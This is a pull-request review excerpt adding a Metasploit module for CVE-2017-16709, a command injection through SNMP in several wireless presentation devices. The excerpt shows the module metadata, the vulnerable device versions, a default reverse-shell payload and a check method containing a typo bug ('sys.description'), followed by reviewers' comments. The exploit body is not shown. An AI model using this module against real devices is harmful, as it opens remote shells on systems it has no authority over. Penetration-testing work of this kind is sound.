modules/exploits/linux/snmp/awind_snmp_exec.rb

```diff
@@ -0,0 +1,168 @@
+##
+
+require 'openssl'
+require 'base64'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::SNMPClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "AwindInc SNMP service command injection",
+      'Description'    => %q{
+        This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection.
+        A valid SNMP read-write community is required to exploit this vulnerability.
+
+        The following devices are known to be affected by this issue:
+
+          * Crestron Airmedia AM-100 <= version 1.5.0.4
+          * Crestron Airmedia AM-101 <= version 2.5.0.12
+          * Awind WiPG-1600w <= version 2.0.1.8
+          * Awind WiPG-2000d <= version 2.1.6.2
+          * Barco wePresent 2000 <= version 2.1.5.7
+          * Newline Trucast 2 <= version 2.1.0.5
+          * Newline Trucast 3 <= version 2.1.3.7
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Quentin Kaiser <kaiserquentin[at]gmail.com>'
+        ],
+      'References'     =>
+        [
+          ['CVE', '2017-16709'],
+          ['URL', 'https://github.com/QKaiser/awind-research'],
+          ['URL', 'https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/']
+        ],
+      'Platform'        => 'unix',
+      'Targets'         => [ [ 'Universal', {} ] ],
+      'Privileged'     => true,
+      'DefaultOptions' =>
+      {
+         'SSL' => false,
+         'PAYLOAD' => 'cmd/unix/reverse_openssl'
+      },
+      'Arch'  => [ ARCH_CMD ],
+      'Payload' =>
+      {
+        'Compat' =>
+        {
+          'PayloadType' => 'cmd',
+          'RequiredCmd' => 'openssl'
+        }
+      },
+      'DisclosureDate' => "Mar 27 2019",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('COMMUNITY', [true, 'SNMP Community String', 'private']),
+      ])
+  end
+
+
+  def check
+    begin
+      connect_snmp
+      sys_description = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
+      print_status("Target system is #{sys_description}")
+      # AM-100 and AM-101 considered EOL, no fix so no need to check version.
+      if sys_description.include? "Crestron Electronics AM-100" or sys.description.include? "Crestron Electronics AM-101"
+        return Exploit::CheckCode::Vulnerable
+      end
+      # TODO: insert description check for other vulnerable models (that I don't have)
+      # In the meantime, we return 'unknown'.
+    rescue SNMP::RequestTimeout
+      print_error("#{ip} SNMP request timeout.")
+    rescue Rex::ConnectionError
+      print_error("#{ip} Connection refused.")
+    rescue SNMP::UnsupportedVersion
+      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
+    rescue ::Interrupt
```

Comment:
What would cause this except a Ctrl+c? If it's just that then this is unnecessary.

Reply:
I based my code on `auxiliary/scanner/snmp/snmp_enum` (see https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/snmp/snmp_enum.rb#L870), but I'll be happy to remove it if not required.

Reply:
@bcoles what do you think ? Should I follow snmp_enum pattern or simply remove the interrupt catch ?